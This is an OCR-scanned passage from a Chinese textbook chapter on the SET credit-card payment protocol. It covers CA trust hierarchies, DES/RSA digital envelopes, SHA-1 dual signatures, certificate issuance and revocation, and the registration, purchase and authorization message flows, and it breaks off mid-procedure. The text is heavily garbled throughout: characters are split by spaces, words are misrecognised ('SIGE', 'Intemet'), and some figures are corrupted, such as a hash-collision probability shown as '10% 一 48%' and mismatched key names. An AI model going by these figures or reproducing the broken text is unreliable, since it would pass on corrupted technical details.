Hash 值 与 包括 在 根 证 书 中 的 替代 密 钥 的 Hash 值 相 比 较 ， 来 确认 替代 根 证 书 的 有 效 性 。 

@ 认证 信息 和 验证 结构 

在 应 用 认证 技术 时 ， 要 涉及 到 认证 信息 和 验证 结构 。 

认证 信息 

在 SET 中 ， 交 易 双 方 的 身份 必须 要 验证 ，CA 是 提供 身份 验证 的 第 三 方 机 构 ， 由 一 
个 或 多 个 用 户 信任 的 组 织 实体 组 成 。 例 如 ， 持 卡 人 要 向 商家 发 送 购物 信息 时 ， 可 以 从 公 
开 媒体 上 获取 商家 的 公开 密 钥 ， 但 持 卡 人 无 法 确定 这 是 否 真是 商家 的 公开 密 钥 以 及 它 的 
信誉 度 是 多 少 。 于 是 持 卡 人 需要 向 CA 请 求 对 商家 进行 认证 。CA 通过 对 商家 发 送 给 持 
卡 人 的 证 书 进行 调查 、 验 证 和 鉴别 后 ， 将 权威 机 构 发 送 的 包含 商家 公 钥 的 证 书 传 给 持 卡 
人 。 同 样 ， 商 家 也 可 对 持 卡 人 进行 验证 。 证 书 一 般 包 含 拥有 者 的 标识 名 称 和 公 钥 ， 并 且 
由 CA 进行 过 数字 签名 。 在 实际 运作 中 ，CA 可 由 大 家 都 信任 的 一 方 担当 。 例 如 ， 在 客 
户 、 商 家 、 银 行 三 角 关 系 中 ， 客 户 使 用 的 是 由 某 个 银行 发 的 卡 ， 而 商家 又 与 此 银行 有 业 
务 关 系 〈 有 账号 )。 在 此 情况 下 ， 客 户 和 商家 都 信任 该 银行 ， 可 由 该 银行 担当 CA 角色 。 
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又 例如 ， 对 商家 自己 发 行 的 购物 卡 ， 则 可 由 商家 自己 担当 CA 角色 。 

证 书 的 树 形 验证 结构 

在 通信 时 ， 交 易 双 方 可 以 通过 出 示 由 某 个 CA 签发 的 证 书 来 证 明 自己 的 身份 。 如 果 
对 签发 证 书 的 CA 本 身 不 信任 ， 则 可 验证 CA 的 身份 ,依次 类 推 ， 一 直到 公认 的 权威 CA 
处 , 就 可 确信 证 书 的 有 效 性 。 SET 证 书 正 是 通过 信任 层次 来 逐 级 验证 的 ,其 结构 如 图 5-4 
所 示 。 沿 着 信任 树 一 直到 一 个 公认 的 信任 组 织 ， 就 可 确认 该 证 书 是 有 效 的 ， 每 一 个 证 书 
与 一 个 数字 化 签发 证 书 的 实体 的 签名 证 书 相关 联 。 例 如 ，C 的 证 书 是 由 名 称 为 B 的 CA 
签发 的 , 而 B 的 证 书 又 是 由 名 称 为 A 的 CA 签发 的 , A 是 权威 的 机 构 , 通常 称 为 根 (Root) 
CA。 验 证 到 了 Root CA 处 ， 就 可 确信 C 的 证 书 是 合法 的 。 在 网 上 购物 过 程 中 ， 持 卡 人 
的 证 书 与 发 卡 机 构 的 证 书 关联 ， 而 发 卡 机 构 的 证 书 通过 不 同 品牌 卡 的 证 书 连 接 到 Root 
CA， 而 Root CA 的 公共 签名 密 钥 对 所 有 的 SET 软件 都 是 已 知 的 ， 因 而 可 以 校 验 每 一 个 
证 书 。 


图 5-4 证 书 管理 方案 的 体系 框架 


6. SET 证 书 管理 及 处 理 流 程 

(1) SET 协议 分 析 

® SET 协议 安全 性 分 析 

为 了 满足 在 Intemet 和 其 他 网 络 上 信用 卡 安全 支付 的 要 求 ，SET 协议 主要 是 通过 使 
用 密码 技术 和 数字 证 书 方 式 来 保证 信息 的 机 密 性 和 安全 性 , 它 实现 了 电子 交易 的 机 密 性 、 
数据 完整 性 、 身 份 的 合法 性 和 不 可 否认 性 。 

机 密 性 〈Confidentislity) 

SET 支付 环境 中 信息 的 机 密 性 是 通过 使 用 混合 加 密 算 法 〈 即 公 钥 加 密 算法 和 对 称 加 
密 算法 相 结合 ) 来 加 密 支 付 信息 而 获得 的 。 一 般 的 做 法 是 ， 用 公 钥 加 密 算 法 来 加 密 包含 
一 个 短 密 钥 的 真实 信息 ， 该 短 密 钥 是 通过 公 钥 一 一 私 钥 密 钥 对 秘密 发 布 的 。SET 中 采用 
的 公 钥 加 密 算法 是 RSA 的 公 钥 密码 体制 ， 私 钥 加 密 算法 采用 的 是 DES 数据 加 密 标准 ， 
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消息 首先 以 56 位 DES 密 钥 加 密 ， 然 后 装 入 使 用 1024 位 RSA 公 钥 加 密 的 数字 信封 在 通 
信 双 方 传 输 。56 位 DES 密 钥 是 使 用 消息 接收 者 的 公 钥 加 密 后 附 在 加 密 的 消息 中 的 。 消 
息 接 收 者 很 容易 用 自己 的 私 钥 解密 来 提取 出 加 密 的 DES 密 钥 ， 然 后 使 用 DES 密 钥 完成 
消息 块 的 解密 过 程 。 这 种 混合 加 密 技 术 在 SET 中 被 形象 地 称 为 数字 信封 (Digital 
Envelope), RSA 加 密 相 当 于 用 信封 密封 。 

数据 完整 性 (Data Integrity) 

SET 协议 使 用 数字 签名 来 保证 数据 的 完整 性 .SET 使 用 安全 Hash 算法 (Secure Hash 
Algorithm, SHA-1) 的 RSA 数字 签名 ，SHA-1 对 于 任意 长 度 的 消息 都 生成 一 个 160 位 
的 消息 摘要 。 如 果 消 息 中 有 一 位 发 生变 化 ,那么 消息 摘要 中 会 大 约 有 10 位 数据 发 生变 化 ， 
两 个 不 同 消息 的 摘要 完全 相同 的 概率 是 10% 一 48%。Hash 函数 的 单 向 性 也 使 得 从 消息 摘 
要 得 出 消息 原文 在 计算 上 是 不 可 行 的 ， 消 息 摘要 的 这 些 特 征 事 实 上 可 以 消除 修改 消息 一 
消息 摘要 对 而 不 被 发 现 的 可 能 性 。 

SET 协议 中 还 使 用 双重 签名 来 保证 信息 的 完整 性 。 双 重 签名 的 目的 是 连接 两 个 不 同 
接收 方 的 两 条 信息 ， 如 发 送 给 商家 的 订购 信息 OI 和 发 送 给 银行 的 支付 信息 PI。 其 中 ， 
商家 不 可 以 知道 客户 的 信息 卡 信息 ， 银 行 不 需要 知道 客户 的 订购 信息 细节 。 用 户 用 一 个 
签名 操作 来 数字 签名 两 个 信息 ， 实 现 一 个 双重 签名 。 一 个 双重 签名 是 通过 计算 两 个 消息 
摘要 产生 的 , 并 将 两 个 摘要 连接 在 一 起 形成 一 个 总 摘要 , 用 户 的 私有 签名 密 钥 加 密 摘要 。 
每 个 消息 的 接收 者 取出 自己 能 够 看 到 的 消息 ， 重 新 生成 消息 摘要 来 验证 消息 。 

SIGE (Verification of Identity) 

SET 使 用 基于 X.509 的 PKI， 通 过 数字 证 书 和 RSA 来 达到 对 持 卡 人 账户 、 商 家 、 支 
付 网 关 以 及 银行 的 认证 。SET 是 一 个 基于 可 信和 的 第 三 方 认证 中 心 的 方案 ，CA 在 SET 中 
扮演 了 很 重要 的 角色 ， 证 书 是 核心 。SET 标准 提供 了 通过 认证 中 心 对 证 书 加 以 认证 的 简 
单方 法 来 确保 进行 电子 交易 的 各 方 能 够 互相 信任 。 在 SET 协议 中 ， 有 持 卡 人 证 书 、 特 约 
商店 证 书 、 支 付 网 关 证 书 、 收 单 银行 证 书 和 发 单 银行 证 书 。 

在 SET H, HAHP A) 至 少 要 有 两 对 密 钥 : 一 对 签名 密 钥 Spv (A), Spb (A) 
和 一 对 加 密 密 钥 Epv CA), Epb (A)， 每 对 密 钥 都 有 相应 的 数字 证 书 CertS CA) 和 CertE 
(A)。 签 名 密 钥 由 用 户 自 己 保管 ， 加 密 密 钥 对 要 由 CA 进行 托管 。 

不 可 否认 性 (Non-repudiation of Disputed charges) 

SET 协议 中 数字 证 书 的 发 布 过 程 也 包含 了 商家 和 客户 在 交易 中 存在 的 信息 。 因 此 ， 
如 果 客 户 用 SET 发 出 了 一 个 商品 的 订单 ， 在 收 到 货物 后 ， 他 不 能 否认 发 出 这 个 订单 ， 同 
样 ， 商 家 以 后 也 不 能 否认 收 到 过 这 个 订单 。 

@ SET 协议 性 能 分 析 

可 以 看 出 ，SET 使 用 了 各 种 密码 技术 ， 构 建 了 完善 的 认证 体系 ， 定 义 了 完备 的 电子 
交易 流程 。 它 较 好 地 解决 了 电子 交易 各 方 之 间 的 、 复 杂 的 信任 关系 和 安全 连接 ， 确 保 了 
电子 交易 所 要 求 的 保密 性 、 数 据 完 整 性 、 身 份 认证 性 和 不 可 否认 性 等 安全 需求 。 


| Be 


Ws eee reine 
SET 是 专 为 网 上 卡 支 付 而 建立 的 协议 ， 为 电子 支付 提供 了 足够 的 安全 性 ， 它 具有 许 


。 SET 对 商家 提供 了 保护 自己 的 手段 ， 使 商家 免 受 欺诈 的 困扰 ， 并 使 商家 的 运营 成 
本 降低 ; 
o 对 消费 者 而 言 , SET 保证 了 商家 的 合法 性 , 并 且 用 户 的 信用 卡号 不 会 被 窃取 , SET 
替 消费 者 保护 了 更 多 的 秘密 使 其 在 线 购物 更 加 轻松 放心 ; 
© SET 帮助 银行 和 发 卡 机 构 将 业务 扩展 到 Internet 这 个 广阔 的 空间 中 ， 使 得 信用 卡 
网 上 支付 具有 更 低 的 欺诈 概率 ， 因 此 比 其 他 支付 方式 具有 更 大 的 竞争 力 ; 
。 SET 对 于 参与 交易 的 各 方 定义 了 互 操 作 接 口 ， 一 个 系统 可 以 由 不 同 厂 商 的 产品 
构筑 。 
与 此 同时 ，SET 协议 庞大 而 又 复杂 ， 在 一 个 典型 的 SET 交易 过 程 中 ， 需 验证 数字 证 
书 9 次 ， 验 证 数字 签名 6 次 ， 传 送 证 书 7 次， 进行 5 次 签名 ，4 次 对 称 加 密 和 4 次 非 对 
称 加 密 。SET 涉及 的 实体 较 多 ， 客 户 、 商 家 和 银行 都 需要 改造 系统 才能 实现 互 操作 ， 使 
用 相当 麻烦 。 由 于 SET 要 求 在 银行 网 络 、 商 家 服务 器 、 顾 客 PC 上 安装 相应 软件 ， 并 向 
各 方 发 放 证 书 ， 其 使 用 费用 非常 昂贵 。 另 外 SET 交易 模式 只 能 用 于 B2C (Business to 
Consumer， 企 业 与 消费 者 之 间 的 电子 商务 ) 模式 ， 不 能 用 于 B2B (Business to Business, 
企业 间 的 电子 商务 ) 模式 ， 而 且 它 在 B2C 模式 中 也 十 分 受 限 ， 只 能 应 用 于 一 些 受 约束 的 
卡 支付 业务 。 
因此 , 虽然 SET 在 电子 支付 中 得 到 了 广泛 的 应 用 , 受到 电子 商务 推动 者 的 高 度 重 视 ， 
但 它 也 有 下 面 一 些 局 限 : 
。 SET 报 文 消息 太 复杂 。SET 定义 了 支付 过 程 的 报 文 消 息 及 数据 ， 由 于 其 规范 的 目 
标 是 全 球 使 用 ， 考 虑 的 因素 很 多 主要 是 美国 的 支付 方式 ， 而 对 其 他 国家 来 讲 报 文 
消息 显得 过 于 复杂 ， 造 成 SET 应 用 软件 设计 复杂 ， 价 格 高 ， 影 响 了 SET 的 普及 。 
© SET 涉及 的 实体 较 多 。 要 实现 SET 支付 ， 客 户 、 商 家 、 支 付 网 关 必 须 同 时 支持 
SET， 因 而 各 方 建设 和 协调 的 困难 造成 互 操作 性 差 。 
© SET 没有 解决 交易 中 证 据 的 生成 和 保留 。SET 协议 仅 解决 了 支付 信息 的 认证 。 交 
易 后 ， 顾 客 〈 商 家 ) 处 理 争 议 时 ， 缺 乏 有 效 说 明 来 划分 责任 ， 无 法 满足 电子 商务 


协议 的 公平 性 原则 。 
。 SET 协议 中 没有 对 交易 过 程 作 状 态 描述 ,这 可 能 使 顾客 或 商家 对 交易 的 状态 难以 
把 握 。 


(2) SET 协议 的 证 书 管理 
© 证 书 管理 结构 
SET 的 证 书 管理 结构 包括 9 个 部 分 , 是 根据 进行 CA 验证 和 SET 证 书 管理 的 需要 来 
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RCA (Root Certificate Authority， 根 CA) 
采用 非常 严格 的 物理 方式 来 控制 ， 保 持 其 非 在 线 状 态 ，RCA 极 少 被 访问 来 发 行 新 的 
品牌 CA 和 一 个 新 的 根 证 书 RC。 

BCA (Brand CA， 品 牌 CA) 

可 以 允许 一 定 程度 的 自治 ，BCA 操作 采用 严格 的 物理 方式 控制 ，BCA 向 其 层次 下 
的 实体 发 放 证 书 。 

GCA (Geo-Political CA， 地 域 政策 CA) 

GCA 允许 该 品牌 在 一 个 地 理 区 域 或 一 个 政策 范围 内 ， 执 行 证 书 管理 的 职责 ，GCA 
负责 为 可 能 泄密 的 证 书 产 生 、 保 持 、 分 发 证 书 撤消 列表 CRL。 

CCA (Card holder CA, 持 卡 人 CA) 

CCA 用 于 为 持 卡 人 分 发 持 卡 人 证 书 , 可 通过 Web 或 E-mail 方式 接受 证 书 请 求 , CCA 
与 发 卡 行 保持 联系 ， 以 便 验证 持 卡 人 账户 。 

MCA (Merchant CA， 商 家 CA) 


PCA (Payment Gateway CA， 支 付 网 关 CA) 

PCA 由 一 个 支付 卡 品牌 、 收 单行 或 另 一 个 团体 来 操作 。 
Card holder 〈 持 卡 人 ) 

从 CCA 申请 和 接收 证 书 。 

Merchant (HR) 

从 MCA 申请 和 接收 证 书 。 

Payment Gateway《 支 付 网 关 ) 

从 PCA 申请 和 接收 证 书 。 

图 5-5 描述 了 证 书 管理 结构 。 


Payment Gateway 


图 5-5 证 书 管理 结构 
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@ 证 书 管理 功能 

CA 为 其 证 书 管理 层次 下 的 实体 提供 三 个 基本 服务 ， 即 证 书 发 行 、 更 新 和 撤消 。 

WEB AT (Certificate Issuance) 

SET 定义 有 三 种 方式 ;Web 方式 〈 交 互 式 )、E-mail 方式 和 离线 GEZER) 方式 。 

因为 交互 式 具 有 灵活 方便 等 优点 , 故 首选 Web 方式 , 如 持 卡 人 通过 Web 申请 CCA, 
需 经 历 三 个 阶段 : 

O 持 卡 人 申请 证 书 的 请 求 /应 答 过 程 。 通 过 消息 变量 Card Init Reg 和 Card list Res 
来 唤醒 SET 应 用 ， 并 分 发 根 的 签名 证 书 ， 此 过 程 中 包含 采用 Web 所 需 的 MIME 信息 。 

© 持 卡 人 申请 登记 表 的 请 求 /应 答 过 程 ， 通 过 消息 变量 Reg Form Reg 和 Reg Form 
Res 来 传递 登记 表 。 

© 证 书 请 求 和 生成 过 程 。 通 过 Cert Reg 和 Cert Res 来 颁发 证 书 。 

通过 三 对 消息 的 交换 。 申 请 者 可 将 私人 信息 和 账号 传递 给 CA， 而 CA 通过 确认 身 
份 ,〈 与 发 卡 行 协作 ) 后 颁发 证 书 。 

证 书 更 新 〈Certificate Renewal) 

出 于 安全 考虑 ， 密 钥 都 有 一 定 的 使 用 期 ， 因 此 所 有 的 证 书 都 需要 定期 更 新 ， 在 每 份 
证 书 中 都 说 明了 失效 期 ， 具 体 的 更 新 周期 ， 由 CA 制定 的 策略 来 决定 。 根 证 书 被 更 新 后 ， 
只 是 失去 了 发 证 功能 ,但 仍 存在 于 信任 链 中 ， 直 到 它 颁 发 的 所 有 证 书 都 失效 后 ，RCA A 
失效 。 证 书 更 新 过 程 与 证 书 颁发 过 程 相同 。 

证 书 撤消 (Certificate Revocation) 

证 书 撤消 是 整个 证 书 管理 机 制 中 最 有 效 的 安全 保障 手段 ， 它 能 够 及 时 避免 证 书面 临 
危险 时 对 SET 交易 的 影响 ， 有 多 种 原因 需要 对 证 书 进行 撤消 ， 如 怀疑 私 钥 泄漏 、 证 书 标 
识 信息 被 改变 、 以 及 中 止 使 用 等 , 它 在 一 定 程度 上 体现 和 延续 了 现今 的 信用 卡 管理 体系 ， 
使 证 书 达 到 或 超过 信用 卡 的 安全 程度 ， 充 分 保障 了 网 上 的 正常 交易 。 

CRL (Certificate Revocation List， 证 书 废除 列表 ) 是 由 X. 509 协议 定义 的 一 种 用 于 
公布 和 分 发 含有 被 废除 证 书 的 列表 的 机 制 。 每 个 CA( 除 MCA 和 CCA 外 ) 都 维护 着 一 
个 自己 的 CRL， 用 于 公布 被 废除 的 由 它 所 生成 和 签 定 的 证 书 名 单 。BCL (Brand CRL 
Identifier) 是 指针 对 某 个 信用 卡 品 牌 的 所 有 目前 使 用 的 CRL， 是 由 SET 协议 定义 的 ， 
H BCA (Brand Certificate Authority) 来 维护 。 每 当 一 份 证 书 被 废除 ，CA 就 会 发 布 新 的 
CRL， 而 相应 的 BCL 也 会 被 更 新 。SET 协议 运用 CRL 和 BCL， 可 以 有 效 地 避免 交易 过 
程 中 欺诈 行为 所 带 来 的 危害 ， 它 赋予 了 证 书 管理 更 为 有 力 和 更 具 效 率 的 可 操作 性 。 在 证 
书 废除 的 复杂 机 制 中 , 支付 网 关 担 当 着 至 关 重 要 的 角色 。 这 是 因为 SET 交易 中 支付 网 关 
是 传递 支付 信息 的 枢纽 ， 它 将 由 持 卡 人 传 来 的 支付 自动 递交 给 支付 银行 的 主机 ， 并 把 交 
易 结果 反馈 回 商家 。SET 协议 针对 参与 交易 的 不 同 对 象 ， 制 定 了 具体 的 证 书 废 除 过 程 。 

。 持 卡 人 证 书 的 废除 

SET 1.0 版 本 没有 持 卡 人 证 书 的 废除 功能 。 证 书 的 废除 功能 是 通过 信用 卡 黑 名 单 来 
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实现 。 

。 商家 证 书 的 废除 

SET 1.0 版 本 也 没有 商家 证 书 的 废除 功能 。 当 一 个 商家 终止 与 指定 的 支付 网 关 的 联 
系 时 ， 该 支付 网 关 就 有 能 力 拒绝 所 有 来 自 此 商家 的 支付 请 求 。 

。 支付 网 关 证 书 的 废除 

一 旦 支付 网 关 的 证 书 遭 到 恶意 攻击 ， 可 能 处 于 危险 时 ， 就 必须 及 时 废除 ， 并 重新 申 
请 证 书 。 

。 CA 证 书 的 废除 

对 于 CA 来 说 , 受到 有 效 攻 击 的 可 能 性 极 低 , 但 无 论 如 何 , 一 旦 有 成 功 的 攻击 出 现 ， 
CA 的 旧 证 书 就 必须 被 废除 。 

由 于 SET 交易 的 关键 是 密 钥 的 加 、 解 密 过 程 ， 而 证 书 又 是 密 钥 的 载体 ， 因 此 ， 从 某 
种 意义 上 说 ， 证 书 管理 也 就 近乎 于 密 钥 管理 。 通 过 证 书 管 理 的 填 密 策略 和 行 之 有 效 的 手 
BL, SET 协议 将 在 开放 的 网 络 上 进行 信用 交易 的 幻想 变 了 现实 。 证 书 管理 涵盖 了 SET 交 
易 的 全 过 程 ， 成 了 SET 协议 的 灵魂 。 

证 书 链 确 认 

。 验证 证 书 链 

上 面 描述 了 SET 证 书 的 层次 关系 ,其 中 每 一 层 都 由 其 上 层 产 生 , 证 书 就 是 通过 这 样 
的 信任 层次 来 验证 的 ， 每 个 证 书 对 应 于 发 行 该 证 书 的 实体 的 签名 证 书 ， 通 过 直到 RCA 
的 信任 层次 来 验证 证 书 ， 证 书 有 效 性 的 验证 路 径 称 为 “签名 链 ” 

证 书 链 的 确认 要 求 保证 : 路 径 中 每 个 证 书 到 根 证 书 是 有 效 的 ， 并 且 每 个 证 书 要 正确 
对 应 发 行 该 证 书 的 CA，SET 证 书 链 验证 方法 是 按照 “Section 12.4.3 of Amendment 1 to 
X.509” 的 处 理 要 求 进行 的 ，SET 对 证 书 链 的 验证 是 对 X. 509 标准 的 扩充 。 
因此 ， 由 证 书 管理 的 层次 关系 而 映射 形成 的 证 书信 任 链 决定 了 验证 证 书 合法 性 的 途 
径 ， 每 份 证 书 都 与 其 颁发 者 的 签名 证 书 相 联系 ， 在 交易 双方 的 通信 过 程 中 ， 认 证 系统 会 
将 对 方 的 证 书 沿 着 信任 链 逐 级 追溯 到 RCA， 而 所 有 SET 软件 都 知道 RCA 的 公开 签名 密 
钥 ， 从 而 确认 该 证 书 的 合法 性 。 

。 证 书 中 的 日 期 

证 书 到 期 日 期 的 验证 是 签名 链 验证 过 程 的 一 个 组 成 部 分 ， 对 于 一 个 最 终 实 体 证 书 的 
验证 ， 要 求 所 有 信任 链 都 是 有 效 的 ， 并 且 链 中 所 有 证 书 没 有 一 个 是 超期 的 。 为 了 对 证 书 
链 中 所 有 证 书 进行 日 期 验证 ， 有 以 下 处 理 要 求 : 

所 有 SET 软件 验证 证 书 日 期 ， 都 作为 签名 链 验证 处 理 的 一 部 分 。 

SET 软件 提供 一 个 机 制 来 防止 使 用 超期 证 书 。 

证 书 的 使 用 期 限 应 当 限 制 在 该 证 书 的 有 效 时 间 范 围 之 内 ， 并 且 在 发 行 CA 的 签名 证 
书 的 私 用 密 钥 使 用 的 有 效 时 间 之 内 。 
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。 指纹 

指纹 是 对 证 书 、CRL、BCL 计算 的 Hash 值 ， 一 个 最 终 实 体 在 发 出 的 消息 中 包含 指 
纹 ， 作 为 一 种 识别 自己 所 保存 的 证 书 、CRL 等 内 容 的 简洁 方法 。 

消息 接收 者 发 现 消 息 中 包含 指纹 ， 可 以 检查 指纹 ， 并 在 下 行 消息 中 《〈 一 般 是 响应 消 
息 中 ) 插入 发 送 者 没有 但 是 交易 中 需要 的 任何 证 书 、CRL 或 BCL。 

(3) SET 处 理 流 程 

SET 协议 的 工作 流程 : 可 从 一 个 完整 的 购物 处 理 流 程 来 看 ， 如 图 5-6 所 示 。 


图 5-6 SET 协议 的 处 理 流程 


© 持 卡 人 注册 〈Cardholder Registration) 
持 卡 人 在 向 商家 购物 之 前 必须 在 CA 注册 ， 为 了 向 CA 发 送 SET 消息 ， 持 卡 人 必须 
拥有 CA 的 公 钥 ， 这 由 CA 的 密 钥 交换 证 书 提供 。 
。 持 卡 人 软件 请 求 CA 的 密 钥 交 换 公 钥 证 书 。 
CA 接受 初始 化 请 求 : 
。 产生 响应 消息 及 响应 消息 的 消息 摘要 并 用 其 签名 私 钥 加 密 来 生成 数字 签名 ; 
。 将 响应 消息 连同 密 钥 交换 证 书 和 签名 证 书 发 送 给 持 卡 人 。 
持 卡 人 的 软件 收 到 初始 化 响应 消息 : 
校 验 两 个 证 书 (遍历 信任 链 ); 
。 验证 CA 签名 (用 CA 的 签名 公 钥 解密 其 数字 签名 并 将 结果 与 新 产生 的 响应 消息 
的 Hash 值 比较 ); 
持 卡 人 输入 账号 ; 
持 卡 人 的 软件 产生 注册 表 请 求 信息 ; 
。 产生 Deskeyl 随机 对 称 密 钥 来 加 密 请 求 信息 ; 
© 用 CA 的 密 钥 交换 公 钥 加 密 Deskeyl 和 持 卡 人 的 账号 得 到 数字 信封 ; 
。 把 (加 密 的 注册 表 请 求 消息 十 数字 信封 发 给 CA。 
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CA 收 到 后 : 

。 用 其 私有 交换 密 钥 解密 持 卡 人 账号 及 Deskeyl， 然 后 用 Deskeyl 解密 注册 表 请 求 ; 

。 确定 适当 的 注册 表 ， 产 生 注 册 表 的 消息 摘要 ， 并 用 其 私有 签名 密 钥 生成 其 数字 签 
名 ; 

。 将 数字 签名 后 的 注册 表 和 CA 的 签名 公 钥 证 书 发 送 给 持 卡 人 。 

持 卡 人 的 软件 收 到 注册 表 后 : 

。 验证 CA 签名 公 角 证书 ; 

。 验证 CA 的 签名 ， 即 用 CA 的 签名 公 钥 来 解密 CA 的 签名 并 将 结果 与 新 生成 的 注 

册 表 的 Hash 值 比较 ; 

产生 一 对 公开 /私有 签名 密 钥 ; 

持 卡 人 填写 注册 表 ; 

持 卡 人 的 软件 产生 证 书 请 求 ， 包 括 填 入 注册 表 的 信息 ; 

持 卡 人 的 软件 将 证 书 请 求 、 持 卡 人 的 签名 公 钥 及 新 产生 Deskey2 一 起 组 成 “信息 ”， 

然后 生成 证 书 请 求 的 消息 摘要 并 用 持 卡 人 的 签名 私 钥 加 密 来 创建 数字 签名 ; 

o 持 卡 人 的 软件 产生 Deskey3 加 密 “ 信 息 ” 这 个 密 钥 连同 持 卡 人 账户 信息 一 起 用 
CA 的 密 钥 交换 公 钥 加 密生 成 数字 信封 ; 

。 持 卡 人 软件 把 〈 加 密 的 证 书 请 求 信息 十 数字 信封 ) 传送 给 CA。 

CA 收 到 后 : 

。 用 其 私有 交换 密 钥 解密 Deakey3， 用 Deskey3 解密 证 书 请 求 ; 

。 验证 持 卡 人 签名 ， 即 用 持 卡 人 签名 公 钥 解密 持 卡 人 签名 并 将 结果 与 新 产生 的 证 书 
请 求 的 Hash 值 进行 比较 ; 

。 用 持 卡 人 账户 信息 和 注册 表格 上 的 信息 校 验 其 与 证 书 请 求 信息 是 否 一 致 ， 

一 旦 通过 校 验 ，CA 创建 持 卡 人 证 书 并 用 其 私有 签名 密 钥 签署 证 书 ; 

CA 用 来 自持 卡 人 请 求 信息 中 的 Deskey2 加 密 证 书 ， 并 产生 证 书 响应 消息 ， 然 后 

生成 响应 消息 摘要 ， 并 用 其 私有 签名 密 钥 加 密 来 创建 数字 签名 ; 

© CA 把 证 书 响应 消息 连同 CA 的 签名 公 钥 证 书 传送 给 持 卡 人 。 

持 卡 人 软件 收 到 后 : 

o 使 用 保存 的 Deskey2 解密 证 书 响应 消息 ; 

。 通过 信任 链 校 验证 书 ; 

。 验证 CA 签名 ， 即 用 CA 的 签名 公 钥 来 解密 CA 签名 并 把 结果 和 最 新 产生 的 证 书 
响应 的 Hash 值 相 比 较 ; 

。 将 其 证 书 及 来 自 证 书 响应 的 信息 储存 起 来 以 备 将 来 的 应 用 。 

@) 商家 注册 (Merchant Registration ) 

© 商家 软件 请 求 CA 的 密 钥 交 换 证 书 和 注册 表 。 

CA 收 到 请 求 后 : 
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。 识别 商家 金融 机 构 ， 选 择 合适 的 注册 表 并 数字 签名 ; 

。 将 数字 签名 后 注册 表 连 同 密 钥 交 换 证 书 和 签名 证 书 发 给 商家 。 

商家 软件 收 到 后 : 

。 验证 CA 的 两 个 证 书 ; 

验证 CA 的 数字 签名 ; 

。 产生 各 一 对 密 钥 交换 密 钥 对 和 签名 密 钥 对 ; 

商家 在 注册 表 中 填写 商家 名 称 、 地 址 及 商家 太 〈 收 单行 中 的 唯一 标识 ); 

商家 软件 产生 证 书 请 求 ; 

。 商家 软件 将 证 书 请 求 和 两 个 公 钥 组 成 “消息 ” 并 数字 签名 “消息 ”; 

。 产生 Deskey4〔( 随 机 对 称 密 钥 )， 用 Deskey4 加 密 签名 后 消息 ， 用 CA 的 密 钥 交换 
公 钥 加 密 Deskey4 和 商家 的 ID 形成 数字 信封 ， 再 将 所 有 信息 向 CA 发 出 。 

CA 收 到 后 : 

。 用 密 钥 交换 私 钥 解 开 数 字 信封 的 Deskey4 和 商家 的 ID, 用 Deskey5 解密 (10) 中 
的 加 密 消息 得 到 注册 表 请 求 ; 

。 根据 商 家 的 数字 签名 验证 注册 表 请 求 ， 如 果 签 名 有 效 ， 消 息 处 理 继续 ， 和 否则 ， 返 

回 商家 提示 消息 响应 ; 

。 使 用 商家 账户 信息 验证 注册 表 请 求 ; 

。 注意 : SET 协议 中 没有 定义 CA 和 收 单行 如 何 交 换 信息 验证 注册 表 内 的 信息 ; 

。 如 果 注 册 表 信息 有 效 ，CA 产生 一 个 证 书 响应 ， 并 数字 签名 ; 

。 将 证 书 响应 十 商家 的 两 个 公 钥 十 CA 的 签名 公 钥 ) 发 给 商家 。 

商家 收 到 后 : 

。 验证 证 书 ; 

。 验证 CA 的 数字 签名 ; 

。 保存 证 书 至 安全 地 方 。 

@ 购买 请 求 (Purchese Request) 

。 持 卡 人 到 商家 的 网 站 浏览 、 挑 选 、 订 购 后 请 求 支付 网 关 的 密 钥 交换 证 书 ; 

。 商家 收 到 请 求 后 ， 为 该 消息 制定 Numl (唯一 识别 号 ) 并 用 商家 签名 私 钥 数字 签 
名 ,然后 将 (签名 后 Numll 十 商家 签名 证 书 十 支付 网 关 的 密 钥 交换 证 书 ) 发 给 持 
KA. 

持 卡 人 收 到 后 : 

。 验证 商家 和 支付 网 关 证 书 ， 并 保存 证 书 ; 

。 产生 订购 信息 OI 和 支付 指令 PI， 将 Num 插入 OI 和 PI 中 ; 

o 生成 OI 和 PI 的 双重 签名 , BIX COL 的 消息 摘要 十 PI 的 消息 摘要 ) 计算 Hash 值 ， 
再 对 Hash 值 用 持 卡 人 的 签名 私 钥 加 密 ; 

。 产生 Deskey6〈 随 机 对 称 密 钥 ); 
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。 用 Deskey6 加 密 PI 的 双重 签名 等 得 到 加 密 的 支付 信息 ; 用 Deskey6 加 密 持 卡 人 
账号 ; 用 支付 网 关 的 密 钥 交换 公 钥 加 密 Deskey6 形成 支付 信封 ; 

。 将 OI 的 双重 签名 、 支 付 信封 、 加 密 的 支付 信息 、PI 的 消息 摘要 、 持 卡 人 密 钥 交 
换 证 书 一 起 发 送 给 商家 。 

商家 收 到 后 : 

。 验证 持 卡 人 证 书 ; 

。 验证 双重 签名 ， 即 用 持 卡 人 的 密 钥 交换 公 钥 解密 OI 的 双重 签名 ,计算 OT 的 消息 
摘要 ， 再 对 OI 的 消息 摘要 和 PI 的 消息 摘要 计算 Hash 值 ， 再 与 解密 后 的 比较 ; 

。 商家 将 PI 送 支付 网 关 ; 

。 生成 购物 响应 消息 并 数字 签名 ; 

。 将 购物 响应 和 商家 密 钥 交换 证 书 发 送 给 持 卡 人 。 

持 卡 人 收 到 购物 响应 后 : 

。 验证 商家 证 书 ; 

。 验证 购物 响应 中 的 商家 签名 ; 

。 持 卡 人 保存 购物 响应 。 

@ 支付 授权 (Payment Authorization) 

。 商家 软件 产生 并 数字 签署 一 个 授权 ， 其 中 包含 授权 的 金额 、Numl; 

。 产生 Deskey7 加 密 授权 请 求 并 用 支付 网 关 的 密 钥 交换 公 钥 生成 网 关 信封; 

。 商家 将 (加 密 后 的 授权 请 求 十 (PI 十 双重 签名 )) 和 “网关 信封 十 持 卡 人 签名 证 
书 十 (商家 的 密 钥 交换 证 书 和 签名 证 书 )) 传 给 支付 网 关 。( 注 意 : SET 协议 中 还 
包括 一 个 销售 交易 ， 允 许 商 家 在 一 个 消息 中 同时 进行 交易 授权 和 支付 请 求 )。 

支付 网 关 收 到 授权 请 求 后 : 

© 解密 网 关 信封 的 Deskey7; 用 Deskey7 解密 请 求 信息 ; 

。 验证 商家 证 书 ; 

验证 商家 签名 ; 

。 支付 网 关 解 密 PI 的 数字 信封 得 到 Deskey6 和 账户 信息 ; 用 Deskey6 解密 得 到 PI; 

验证 持 卡 人 证 书 ; 

